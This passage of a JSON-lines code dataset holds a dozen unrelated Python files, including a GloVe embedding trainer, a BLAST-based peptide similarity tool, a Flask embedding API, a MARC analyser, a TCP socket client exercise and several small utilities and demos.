0\n for ele in candidate_.graph.getCorners():\n if ele.get_score() < 0:\n corner_count +=1\n for ele in candidate_.graph.getEdges():\n if ele.get_score() < 0:\n edge_count += 1\n data['iter_{}_num_{}'.format(k, idx)] = {'score': round(candidate_.graph.graph_score(), 2),\n 'corner_score': round(candidate_.graph.corner_score(), 2),\n 'edge_score': round(candidate_.graph.edge_score(), 2),\n 'region_score': round(candidate_.graph.region_score(), 2),\n 'false_corner': corner_count,\n 'false_edge': edge_count}\n\n # best\n for idx, candidate_ in enumerate(best_candidates):\n corner_count = 0\n edge_count = 0\n for ele in candidate_.graph.getCorners():\n if ele.get_score() < 0:\n corner_count +=1\n for ele in candidate_.graph.getEdges():\n if ele.get_score() < 0:\n edge_count += 1\n data['best_{}'.format(idx)] = {'score': round(candidate_.graph.graph_score(), 2),\n 'corner_score': round(candidate_.graph.corner_score(), 2),\n 'edge_score': round(candidate_.graph.edge_score(), 2),\n 'region_score': round(candidate_.graph.region_score(), 2),\n 'false_corner': corner_count,\n 'false_edge': edge_count}\n\n np.save(os.path.join(base_path, 'config'), data)\n\n\n\n\n\n","sub_path":"new_search.py","file_name":"new_search.py","file_ext":"py","file_size_in_byte":11441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"21030962","text":"import asyncio, requests\nfrom time import time\n\n\ndef request(n):\n pass\n\nasync def a():\n print('A start')\n for i in range(4):\n print('A', i)\n await asyncio.sleep(3)\n print('A FINISH')\n return\n\n\nasync def b():\n print('B start')\n for i in range(4):\n print('B', i)\n await asyncio.sleep(2)\n print('B FINISH')\n return\n\n\nasync def c():\n print('C start')\n for i in range(4):\n print('C', i)\n await asyncio.sleep(3)\n print('C FINISH')\n return\n\n\nasync def d():\n print('D start')\n for i in range(4):\n print('D', i)\n await asyncio.sleep(1)\n print('D FINISH')\n return\n\nloop = asyncio.get_event_loop()\ntic = time()\nloop.run_until_complete(asyncio.gather(a(), b(), c(), d()))\ntac = time()\nloop.close()\nprint(tac-tic)\n\n\n# from time import time, sleep\n#\n# def a():\n# print('A start')\n# #await asyncio.sleep(3)\n# for i in range(4):\n# print('A', i)\n# sleep(3)\n# print('A FINISH')\n# return\n#\n# def b():\n# print('B start')\n# #await asyncio.sleep(7)\n# for i in range(4):\n# print('B', i)\n# sleep(1)\n# print('B FINISH')\n# return\n#\n# def c():\n# print('C start')\n# #await asyncio.sleep(5)\n# for i in range(4):\n# print('C', i)\n# sleep(5)\n# print('C FINISH')\n# return\n#\n# def d():\n# print('D start')\n# #await asyncio.sleep(3)\n# for i in range(4):\n# print('D', i)\n# sleep(1)\n# print('D FINISH')\n# return\n#\n#\n# tic = time()\n# a()\n# b()\n# c()\n# d()\n# tac = time()\n# print(tac-tic)\n","sub_path":"search/tests/test_a.py","file_name":"test_a.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"476855667","text":"from http import HTTPStatus\n\nfrom flask import Flask\nfrom logging.config import dictConfig\nfrom flask_restplus import Api, Resource, fields\nfrom core.proxy_wrapper import ReverseProxied\nfrom tasks import get_embeddings\n\nimport logging\n\ndictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',\n }},\n 'handlers': {'wsgi': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'default'\n }},\n 'root': {\n 'level': 'DEBUG',\n 'handlers': ['wsgi']\n }\n})\n\n# define app\napp = Flask(__name__)\napp.wsgi_app = ReverseProxied(app.wsgi_app)\napp.logger.setLevel(logging.INFO)\n\n\n# define API\napi = Api(app, version='1.0', title='Embedding API',\n description=\"An API for embedding strings\")\n\n# API for strings\nstrings_model = api.model('Texts', {\n 'texts': fields.List(\n fields.String,\n example=[\n 'Ich bin darüber hocherfreut. Weiter so!',\n 'Nie wieder! Das was absolut schrecklich.'\n ],\n required=True\n ),\n})\n\n\n@api.route('/embed')\nclass StringsEmbedding(Resource):\n @api.expect(strings_model)\n def post(self):\n comment_texts = api.payload.get('texts', [])\n results = get_embeddings(comment_texts)\n return results, HTTPStatus.OK\n\n\n# run app manually\nif __name__ == \"__main__\":\n app.run(threaded=True, port=5060)\n","sub_path":"embedding-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"582693236","text":"from pymarc import MARCReader\nfrom unicode_csv import UnicodeWriter\nimport sys\nfrom pprint import pprint\nfrom tags import meaning\n\ndef _update_analysis(analysis, record_analysis, sample_length):\n # merge this record analysis into the global analysis dict\n \n #first create 'empty' records for all currently known tags\n for tag, stats in analysis.iteritems():\n if not record_analysis.has_key(tag):\n record_analysis[tag] = {\n 'valency': 0,\n 'samples': set(),\n 'subfields': {},\n }\n for subfield in stats['subfields']:\n record_analysis[tag]['subfields'][subfield] = {\n 'valency': 0,\n 'samples': set(), \n }\n \n \n #now merge proper\n for tag, stats in record_analysis.iteritems():\n main_analysis = analysis.get(tag, {\n 'count': 0,\n 'min_valency': sys.maxint,\n 'max_valency': 0,\n 'subfields': {},\n 'samples': set(),\n })\n main_analysis['count'] += stats['valency']\n main_analysis['min_valency'] = min(main_analysis['min_valency'], stats['valency'])\n main_analysis['max_valency'] = max(main_analysis['max_valency'], stats['valency'])\n \n if len(main_analysis['samples']) < sample_length:\n #union the two sets, then clip to the sample length - needs to be a list to do this\n main_analysis['samples'] = set(list(main_analysis['samples'].union(stats['samples']))[:sample_length])\n \n #and now subfields. INCEPTION\n for subfield, substats in stats['subfields'].iteritems():\n main_sub_analysis = main_analysis['subfields'].get(subfield, {\n 'count': 0,\n 'min_valency': sys.maxint,\n 'max_valency': 0,\n 'subfields': {},\n 'samples': set(),\n })\n main_sub_analysis['count'] += substats['valency']\n main_sub_analysis['min_valency'] = min(main_sub_analysis['min_valency'], substats['valency'])\n main_sub_analysis['max_valency'] = max(main_sub_analysis['max_valency'], substats['valency'])\n\n if len(main_sub_analysis['samples']) < sample_length:\n #union the two sets, then clip to the sample length - needs to be a list to do this\n main_sub_analysis['samples'] = set(list(main_sub_analysis['samples'].union(substats['samples']))[:sample_length])\n \n main_analysis['subfields'][subfield] = main_sub_analysis\n \n analysis[tag] = main_analysis\n return analysis\n \n\ndef multifile_iter_records(files, sample_length, analysis={}):\n n = 0\n for f in files:\n if not hasattr(f, 'read'):\n f = open(f)\n reader = MARCReader(f, to_unicode=True)\n for record in reader:\n n += 1\n if n % 1000 == 0:\n sys.stderr.write(\"processed %s records\\n\" % n)\n record_analysis = {}\n\n fields = record.get_fields()\n for field in fields:\n attrdict = record_analysis.get(field.tag, {\n 'valency': 0,\n 'samples': set(),\n 'subfields': {},\n })\n \n attrdict['valency'] += 1\n \n if field.is_control_field():\n if len(attrdict['samples']) < sample_length:\n attrdict['samples'].add(field.data) \n else:\n for subfield in field.get_subfield_tuples():\n key =subfield[0]\n sub_attrdict = attrdict['subfields'].get(key, {\n 'valency': 0,\n 'samples': set(),\n })\n \n sub_attrdict['valency'] += 1\n if len(sub_attrdict['samples']) < sample_length:\n sub_attrdict['samples'].add(subfield[1])\n \n attrdict['subfields'][key] = sub_attrdict\n \n record_analysis[field.tag] = attrdict\n\n analysis = _update_analysis(analysis, record_analysis, sample_length) \n \n return analysis \n\ndef marcanalyse(files, sample_length=5):\n \"\"\"\n returns a csv of marc keys and analysed values, showing, for example, how many records exist.\n \n ================= ==============================================================\n Column Description\n ================= ==============================================================\n ``tag`` The 3-digit MARC tag.\n ``subfield`` The single-character subfield.\n ``tag_meaning`` The English meaning of the tag/subfield, if known.\n ``record_count`` The number of records that have at least one of these tags.\n ``min_valency`` The minimum number of this tag or subfield that each record has.\n ``max_valency`` The maximum number of this tag or subfield that each record has.\n ``samples`` Non-repeating sample values of the values of each tag or subfield.\n ================= ==============================================================\n\n \"\"\"\n\n analysis = multifile_iter_records(files, sample_length = sample_length)\n \n csv_header=(\"tag\", \"subfield\", \"tag_meaning\", \"record_count\", \"min_valency\", \"max_valency\",\"samples\")\n\n \n writer = UnicodeWriter(sys.stdout)\n writer.writerow(csv_header)\n \n listanalysis = [x for x in analysis.iteritems()]\n listanalysis.sort()\n\n for key, value in listanalysis:\n v = []\n v.append(u'\"%s\"' % key) #tag\n v.append(u\"\") # subfield\n v.append(meaning(key)) #tag_meaning\n v.append(unicode(value['count'])) #record_count\n v.append(unicode(value['min_valency']))\n v.append(unicode(value['max_valency']))\n v.append(u\"\\r\\r\".join(value['samples']))\n writer.writerow(v)\n \n listanalysis = [x for x in value['subfields'].iteritems()]\n listanalysis.sort()\n for subfield, value in listanalysis:\n v = []\n v.append(\"\") #tag\n v.append(subfield) # subfield\n v.append(meaning(key, subfield)) #tag_meaning\n v.append(unicode(value['count'])) #record_count\n v.append(unicode(value['min_valency']))\n v.append(unicode(value['max_valency']))\n v.append(u\"\\r\\r\".join(value['samples']))\n writer.writerow(v)\n \n ","sub_path":"importtools/marctools/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"445676380","text":"#%%\nimport pandas as pd \nimport pickle \nimport re \nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import LancasterStemmer\nimport nltk \nfrom nltk.corpus import stopwords\n\nporter = PorterStemmer()\nlancaster=LancasterStemmer()\n#%%\nfilename=\"svm_bow.sav\"\n\n\n#%%\ndef normalizer_all(tweet):\n tweets = \" \".join(filter(lambda x: x[0]!= '@' , tweet.split()))\n tweets = re.sub('[^a-zA-Z]', ' ', tweets)\n tweets = tweets.lower()\n tweets = tweets.split()\n tweets = [word for word in tweets if not word in set(stopwords.words('english'))]\n tweets =' '.join([porter.stem(w) for w in tweets])\n return tweets\n\nmessage_love=\" I loving man kiss\"\nclean_message=normalizer_all(message_love)\nprint(clean_message)\n\n\n#a=vectorizer.transform([clean_message])\n\n#%%\nbow= pickle.load(open(\"bow.sav\", 'rb'))\na=bow.transform([clean_message])\nsvm_bow= pickle.load(open(\"svm_bow.sav\", 'rb'))\nprint(svm_bow.predict_proba(a.toarray())[0][0])\n\n#%%\na=bow.transform([clean_message])\n\n#%%\nprint(a.shape)\n\n#%%\nsvm_bow= pickle.load(open(\"knn_bow.sav\", 'rb'))\n\n#%%\nsvm_bow.predict_proba(a.toarray())\n\n#%%\na.toarray().shape\n\n#%%\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"512761069","text":"import numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport itertools\nimport random\nimport sys\nimport os\nimport pickle\nfrom collections import defaultdict\n\nclass GloVe(tf.keras.Model):\n def __init__(self, embedding_dim=128, max_vocab_size=100, \n scaling_factor=0.75, batch_size=512, learning_rate=0.01):\n super(GloVe, self).__init__()\n self.embedding_dim = embedding_dim\n self.max_vocab_size = max_vocab_size\n self.scaling_factor = scaling_factor\n self.batch_size = batch_size\n self.vocab_size = 0\n self.concept2id = None\n self.comap = None\n self.comatrix = None\n self.optimizer = tf.keras.optimizers.Adagrad(learning_rate=learning_rate)\n self.epoch_loss_avg = []\n\n def build_dict(self, corpus):\n tokenizer = tf.keras.preprocessing.text.Tokenizer()\n tokenizer.fit_on_texts(corpus)\n self.concept2id = tokenizer.word_index\n self.vocab_size = len(self.concept2id)\n\n def save_dict(self, save_dir):\n with open(save_dir + \"/concept2id.pkl\", \"wb\") as f:\n pickle.dump(self.concept2id, f)\n print(\"concept2id successfully saved in the savedir\")\n \n def fit_to_corpus(self, corpus):\n self.comap = defaultdict(float)\n self.comatrix = np.zeros((len(self.concept2id)+1, len(self.concept2id)+1), dtype=np.float64)\n concept2id = self.concept2id\n\n for i in tqdm(range(len(corpus))):\n patient = corpus[i]\n for p in patient:\n for k in patient:\n if p != k:\n self.comap[(p, k)] += 1\n \n for pair, count in self.comap.items():\n self.comatrix[concept2id[pair[0]], concept2id[pair[1]]] = count\n\n def init_params(self):\n with tf.device(\"/cpu:0\"):\n \"\"\"must be implemented with cpu-only env since this is sparse updating\"\"\"\n self.target_embeddings = tf.Variable(\n tf.random.uniform([self.vocab_size, self.embedding_dim], 0.1, -0.1),\n name=\"target_embeddings\")\n self.context_embeddings = tf.Variable(\n tf.random.uniform([self.vocab_size, self.embedding_dim], 0.1, -0.1),\n name=\"context_embeddings\")\n self.target_biases = tf.Variable(tf.random.uniform([self.vocab_size], 0.1, -0.1),\n name='target_biases')\n self.context_biases = tf.Variable(tf.random.uniform([self.vocab_size], 0.1, -0.1),\n name=\"context_biases\")\n\n def compute_cost(self, x):\n \"\"\"x = [target_ind, context_ind, co_occurrence_count]\"\"\"\n target_emb = tf.nn.embedding_lookup([self.target_embeddings], x[0])\n context_emb = tf.nn.embedding_lookup([self.context_embeddings], x[1])\n target_bias = tf.nn.embedding_lookup([self.target_biases], x[0])\n context_bias = tf.nn.embedding_lookup([self.context_biases], x[1])\n\n weight = tf.math.minimum(1.0, \n tf.cast(tf.math.pow(\n tf.math.truediv(x[2], tf.cast(self.max_vocab_size, dtype=tf.float64)), \n self.scaling_factor),\n dtype=tf.float32))\n emb_product = tf.math.reduce_sum(tf.math.multiply(target_emb, context_emb), axis=1)\n # add 1 when calculate log_cooccurrence not to get diverging log\n log_cooccurrence = tf.math.log(tf.add(tf.cast(x[2], dtype=tf.float32), 1))\n \n distance_cost = tf.math.square(\n tf.math.add_n([emb_product, target_bias, context_bias, \n tf.math.negative(log_cooccurrence)])) \n \n batch_cost = tf.math.reduce_sum(tf.multiply(weight, distance_cost)) \n \n return batch_cost\n\n def compute_gradients(self, x):\n with tf.GradientTape() as tape:\n cost = self.compute_cost(x)\n return cost, tape.gradient(cost, self.trainable_variables)\n\n def prepare_batch(self):\n\n i_ids = []\n j_ids = []\n co_occurs = []\n\n for i in range(self.comatrix.shape[0]):\n for j in range(self.comatrix.shape[0]):\n if i == j: continue\n i_ids.append(i)\n j_ids.append(j)\n co_occurs.append(self.comatrix[i, j])\n \n assert len(i_ids) == len(j_ids), \"The length of the data are not the same\"\n assert len(i_ids) == len(co_occurs), \"The length of the data are not the same\"\n return i_ids, j_ids, co_occurs\n\n def get_embeddings(self):\n self.embeddings = self.target_embeddings + self.context_embeddings\n \n def save_embeddings(self, save_dir, epoch, avg_loss):\n self.get_embeddings()\n np.save(os.path.join(save_dir, \"glove_emb_e{:03d}_loss{:.4f}.npy\".format(epoch, avg_loss)),\n self.embeddings)\n\n def train_GloVe(self, num_epochs, save_dir, saving_term):\n i_ids, j_ids, co_occurs = self.prepare_batch()\n total_batch = int(np.ceil(len(i_ids) / self.batch_size))\n cost_avg = tf.keras.metrics.Mean()\n self.save_dict(save_dir)\n\n for epoch in range(num_epochs):\n\n progbar = tf.keras.utils.Progbar(len(i_ids))\n\n for i in range(total_batch):\n i_batch = i_ids[i * self.batch_size : (i+1) * self.batch_size]\n j_batch = j_ids[i * self.batch_size : (i+1) * self.batch_size]\n co_occurs_batch = co_occurs[i * self.batch_size : (i+1) * self.batch_size]\n cost, gradients = self.compute_gradients([i_batch, j_batch, co_occurs_batch])\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n cost_avg(cost) \n progbar.add(self.batch_size)\n print(\"Step {}: Loss: {:.4f}\".format(self.optimizer.iterations.numpy(), cost))\n\n if (epoch % 1) == 0: \n avg_loss = cost_avg.result()\n print(\"Epoch {}: Loss: {:.4f}\".format(epoch, avg_loss))\n self.epoch_loss_avg.append(avg_loss)\n \n if (epoch % saving_term) == 0:\n self.save_embeddings(save_dir, epoch, avg_loss)","sub_path":"src/glove.py","file_name":"glove.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"401565201","text":"import csv\nfrom Bio.Blast import NCBIWWW\nfrom Bio.Blast import NCBIXML\nfrom Bio import SeqIO\nimport shutil\nimport re\nimport os\nfrom collections import defaultdict\nfrom time import sleep\n\nclass CalculateReferenceProteomeSimilarity:\n def __init__(self, input_file, input_fasta, output_file, match_length=8, species='human', file_type='vcf'):\n self.input_file = input_file\n self.input_fasta = input_fasta\n self.output_file = output_file\n self.metric_file = \"{}.reference_matches\".format(output_file)\n self.match_length = match_length\n self.species = species\n self.file_type = file_type\n self.species_to_organism = {\n 'human': 'Homo sapiens',\n 'atlantic salmon': 'Salmo salar',\n 'black-headed spider monkey': 'Ateles fusciceps',\n 'blue monkey': 'Cercopithecus mitis',\n 'bonobo': 'Pan paniscus',\n 'bornean orangutan': 'Pongo pygmaeus',\n 'brown-mantled tamarin': 'Saguinus fuscicollis',\n 'chimpanzee': 'Pan troglodytes',\n 'common marmoset': 'Callithrix jacchus',\n 'common squirrel monkey': 'Saimiri sciureus',\n 'cottontop tamarin': 'Saguinus oedipus',\n 'cow': 'Bos taurus',\n 'crab-eating macaque': 'Macaca fascicularis',\n 'dog': 'Canis lupus familiaris',\n \"Geoffroy's tamarin\": 'Saguinus geoffroyi',\n 'golden lion tamarin': 'Leontopithecus rosalia',\n 'gorilla': 'Gorilla gorilla',\n 'grivet': 'Chlorocebus aethiops',\n 'hamadryas baboon': 'Papio hamadryas',\n 'horse': 'Equus caballus',\n 'lar gibbon': 'Hylobates lar',\n 'mouse': 'Mus musculus',\n 'moustached tamarin': 'Saguinus mystax',\n 'olive baboon': 'Papio anubis',\n 'pig': 'Sus scrofa',\n 'rainbow trout': 'Oncorhynchus mykiss',\n 'rhesus macaque': 'Macaca mulatta',\n 'sheep': 'Ovis aries',\n 'southern pig-tailed macaque': 'Macaca nemestrina',\n 'stump-tailed macaque': 'Macaca arctoides',\n 'white-faced saki': 'Pithecia pithecia',\n 'white-fronted spider monkey': 'Ateles belzebuth',\n 'yellow baboon': 'Papio cynocephalus',\n }\n\n def reference_match_headers(self):\n return [\n 'Reference Match',\n ]\n\n def get_mt_peptides(self):\n records = list(SeqIO.parse(self.input_fasta, \"fasta\"))\n if self.file_type == 'vcf':\n records_dict = {x.id.replace('MT.', ''): str(x.seq) for x in filter(lambda x: x.id.startswith('MT.'), records)}\n else:\n records_dict = {x.id: str(x.seq) for x in records}\n return records_dict\n\n def get_wt_peptides(self):\n if self.file_type == 'vcf':\n records = list(SeqIO.parse(self.input_fasta, \"fasta\"))\n records_dict = {x.id.replace('WT.', ''): str(x.seq) for x in filter(lambda x: x.id.startswith('WT.'), records)}\n else:\n return {}\n return records_dict\n\n def extract_n_mer(self, full_peptide, subpeptide_position, mutation_position, mt_length):\n #For non-frameshifts this ensures that we only test match_length epitopes that overlap the mutation\n #If we extract a larger region, we will get false-positive matches against the reference proteome\n #from the native wildtype portion of the peptide\n flanking_sequence_length = self.match_length - 1\n mt_start = (subpeptide_position-1) + (mutation_position-1)\n start = mt_start - flanking_sequence_length\n if start < 0:\n start = 0\n end = mt_start + mt_length + flanking_sequence_length\n return full_peptide[start:end]\n\n def extract_n_mer_from_fs(self, full_peptide, wt_peptide, epitope, subpeptide_position):\n #For frameshifts we want to test all downstream epitopes in the flanking region since they are all potentially novel\n flanking_sequence_length = self.match_length - 1\n start = subpeptide_position - 1 - flanking_sequence_length\n if start < 0:\n start = 0\n #This catches cases where the start position would cause too many leading wildtype amino acids, which would result\n #in false-positive reference matches\n if len(full_peptide) > len(wt_peptide):\n diff_position = [i for i in range(len(wt_peptide)) if wt_peptide[i] != full_peptide[i]][0]\n else:\n diff_position = [i for i in range(len(full_peptide)) if wt_peptide[i] != full_peptide[i]][0]\n min_start = diff_position - self.match_length + 1 \n if min_start > start:\n start = min_start\n end = start + flanking_sequence_length + len(epitope) + flanking_sequence_length\n return full_peptide[start:end]\n\n def metric_headers(self):\n return ['Chromosome', 'Start', 'Stop', 'Reference', 'Variant', 'Transcript', 'Peptide', 'Hit ID', 'Hit Definition', 'Query Sequence', 'Match Sequence', 'Match Start', 'Match Stop']\n\n def execute(self):\n if self.species not in self.species_to_organism:\n print(\"Species {} not supported for Reference Proteome Similarity search. Skipping.\".format(self.species))\n shutil.copy(self.input_file, self.output_file)\n return\n\n mt_records_dict = self.get_mt_peptides()\n wt_records_dict = self.get_wt_peptides()\n\n with open(self.input_file) as input_fh, open(self.output_file, 'w') as output_fh, open(self.metric_file, 'w') as metric_fh:\n reader = csv.DictReader(input_fh, delimiter=\"\\t\")\n writer = csv.DictWriter(output_fh, delimiter=\"\\t\", fieldnames=reader.fieldnames + self.reference_match_headers(), extrasaction='ignore')\n metric_writer = csv.DictWriter(metric_fh, delimiter=\"\\t\", fieldnames=self.metric_headers(), extrasaction='ignore')\n writer.writeheader()\n metric_writer.writeheader()\n processed_peptides = []\n reference_match_dict = defaultdict(list)\n for line in reader:\n if self.file_type == 'pVACbind':\n epitope = line['Epitope Seq']\n peptide = mt_records_dict[line['Mutation']]\n else:\n epitope = line['MT Epitope Seq']\n if self.file_type == 'vcf':\n if line['Variant Type'] == 'FS':\n peptide = self.extract_n_mer_from_fs(mt_records_dict[line['Index']], wt_records_dict[line['Index']], epitope, int(line['Sub-peptide Position']))\n else:\n mt_amino_acids = line['Mutation'].split('/')[1]\n if mt_amino_acids == '-':\n mt_amino_acids = ''\n peptide = self.extract_n_mer(mt_records_dict[line['Index']], int(line['Sub-peptide Position']), int(line['Mutation Position']), len(mt_amino_acids))\n else:\n peptide = mt_records_dict[line['Index']]\n if peptide not in processed_peptides:\n processed_peptides.append(peptide)\n result_handle = NCBIWWW.qblast(\"blastp\", \"refseq_protein\", peptide, entrez_query=\"{} [Organism]\".format(self.species_to_organism[self.species]), word_size=min(self.match_length, 7), gapcosts='32767 32767')\n for blast_record in NCBIXML.parse(result_handle):\n if len(blast_record.alignments) > 0:\n for alignment in blast_record.alignments:\n for hsp in alignment.hsps:\n matches = re.split('\\+| ', hsp.match)\n for match in matches:\n if len(match) >= self.match_length:\n reference_match_dict[peptide].append({\n 'Hit ID': alignment.hit_id,\n 'Hit Definition': alignment.hit_def,\n 'Query Sequence': hsp.query,\n 'Match Sequence': hsp.match,\n 'Match Start': hsp.sbjct_start,\n 'Match Stop': hsp.sbjct_end,\n })\n sleep(10)\n if peptide in reference_match_dict:\n line['Reference Match'] = True\n metric_line = line.copy()\n metric_line['Peptide'] = peptide\n for alignment in reference_match_dict[peptide]:\n metric_line.update(alignment)\n metric_writer.writerow(metric_line)\n else:\n line['Reference Match'] = False\n writer.writerow(line)\n","sub_path":"lib/calculate_reference_proteome_similarity.py","file_name":"calculate_reference_proteome_similarity.py","file_ext":"py","file_size_in_byte":9028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"341444047","text":"import os\nfrom os.path import expanduser\nfrom time import strftime, gmtime, sleep\n\nimport numpy as np\nimport pandas as pd\nimport hashlib\n\nfrom kameleon_rks.tools.log import Log\n\nlogger = Log.get_logger()\n\ndef _create_dir_if_not_exist(fname):\n # create result dir if wanted\n if os.sep in fname:\n try:\n directory = os.sep.join(fname.split(os.sep)[:-1])\n os.makedirs(directory)\n except OSError:\n pass\n\ndef store_samples(samples, fname = expanduser(\"~\") + os.sep + \"results.txt\", **kwargs):\n # add filename if only path is given\n if fname[-1] == os.sep:\n fname += \"results.txt\"\n \n _create_dir_if_not_exist(fname)\n \n # very crude protection against conflicting access from parallel processes\n write_success = False\n while not write_success:\n try:\n # append to file\n f_handle = file(fname, 'a')\n np.savetxt(f_handle, samples)\n f_handle.close()\n write_success = True\n except IOError:\n print(\"IOError writing to %s ... trying again in 1s.\" % fname)\n sleep(1)\n\ndef store_results(fname = expanduser(\"~\") + os.sep + \"results.txt\", **kwargs):\n # add filename if only path is given\n if fname[-1] == os.sep:\n fname += \"results.txt\"\n \n _create_dir_if_not_exist(fname)\n \n # use current time as index for the dataframe\n current_time = strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime())\n new_df = pd.DataFrame([[kwargs[k] for k in kwargs.keys()]], index=[current_time],columns=kwargs.keys())\n \n if os.path.exists(fname):\n df = pd.read_csv(fname, index_col=0)\n df = df.append(new_df)\n else:\n df = new_df\n\n # very crude protection against conflicting access from parallel processes\n write_success = False\n while not write_success:\n try:\n df.to_csv(fname)\n write_success = True\n except IOError:\n print(\"IOError writing to csv ... trying again in 1s.\")\n sleep(1)\n \ndef assert_file_has_sha1sum(fname, sha1_reference):\n sha1 = sha1sum(fname)\n if not sha1 == sha1_reference:\n raise RuntimeError(\"File %s has sha1sum %s which is different from the provided reference %s\" % \\\n (fname, sha1, sha1_reference))\n\ndef sha1sum(fname, blocksize=65536):\n \"\"\"\n Computes sha1sum of the given file. Same as the unix command line hash.\n \n Returns: string with the hex-formatted sha1sum hash\n \"\"\"\n hasher = hashlib.sha1()\n with open(fname, 'rb') as afile:\n logger.debug(\"Hashing %s\" % fname)\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(blocksize)\n return hasher.hexdigest()\n","sub_path":"kameleon_rks/experiments/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"36171400","text":"#\n# Copyright (c) 2008-2015 Thierry Florac \n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n\n__docformat__ = 'restructuredtext'\n\n\n# import standard library\n\n# import interfaces\n\n# import packages\nfrom babel.core import Locale\nfrom babel.numbers import format_decimal\nfrom pyams_utils.request import check_request\n\nfrom pyams_utils import _\n\n\ndef get_human_size(value, request=None):\n \"\"\"Convert given bytes value in human readable format\n\n >>> from pyramid.testing import DummyRequest\n >>> request = DummyRequest(params={'_LOCALE_': 'fr'})\n >>> request.locale_name\n 'fr'\n\n >>> from pyams_utils.size import get_human_size\n >>> get_human_size(256, request)\n '256 bytes'\n >>> get_human_size(3678, request)\n '3,6 Kb'\n >>> get_human_size(6785342, request)\n '6,47 Mb'\n >>> get_human_size(3674815342, request)\n '3,422 Gb'\n \"\"\"\n if request is None:\n request = check_request()\n translate = request.localizer.translate\n locale = Locale(request.locale_name)\n if value < 1024:\n return format_decimal(value, translate(_('0 bytes')), locale)\n value /= 1024\n if value < 1024:\n return format_decimal(value, translate(_('0.# Kb')), locale)\n value /= 1024\n if value < 1024:\n return format_decimal(value, translate(_('0.0# Mb')), locale)\n value /= 1024\n return format_decimal(value, translate(_('0.0## Gb')), locale)\n","sub_path":"src/pyams_utils/size.py","file_name":"size.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"352361477","text":"def main():\n userInput = int(input('Enter a temperature in farenheit: '))\n\n def f2c(userInput):\n cel = ((userInput - 32) / (1.8))\n return cel\n\n print('you entered ',userInput,'in farenheit', 'which is ',f2c(userInput),'in celsius')\nmain()\nwhile True:\n userInput2 = str(input('Do you want to continue? Respond with Y or N '))\n if userInput2 == 'Y' or userInput2 =='y':\n main()\n else:\n break\n\n","sub_path":"Raturetemp.py","file_name":"Raturetemp.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"48198740","text":"#*coding:utf-8*\nimport socket\n\"\"\"\nTCP 的客户端编程\n1.socket\n2.connet (TCP)\n3.send\n4.close\n\"\"\"\n\n\ndef CC_client():\n # 创建\n tcp_cli = socket.socket(family=socket.AF_INET,type=socket.SOCK_STREAM)\n\n # 链接\n SER_IP = \"192.168.43.90\"\n SER_PORT = 8888\n ser_info = (SER_IP,SER_PORT)\n tcp_cli.connect(ser_info)\n\n #send\n while True:\n send_info = str(input(\"客户端发送:\"))\n # if send_info == \"exit\":\n # break\n tcp_cli.send(send_info.encode(\"utf-8\"))\n\n #recv\n\n tcp_cli_recv_info = tcp_cli.recv(1024)\n # print(\"客户端接收:%s\" % tcp_cli_recv_info.decode(\"utf-8\"))\n print(tcp_cli_recv_info)\n #clsoe\n tcp_cli.close()\n\nif __name__ == \"__main__\":\n CC_client()\n","sub_path":"001 网络编程/TCP_client_基本的收发数据.py","file_name":"TCP_client_基本的收发数据.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"468385482","text":"import math\nimport time\n\ndef compute():\n return sum(map(int, list(str(2 ** 1000))))\n\nif __name__ == \"__main__\":\n print(\"Start\")\n print(\"----------------------\")\n start = time.time()\n answer = compute()\n end = time.time()\n print(\"----------------------\")\n print(\"Answer : \", answer)\n print(\"End \", end - start, \"sec\")\n","sub_path":"python/p016.py","file_name":"p016.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
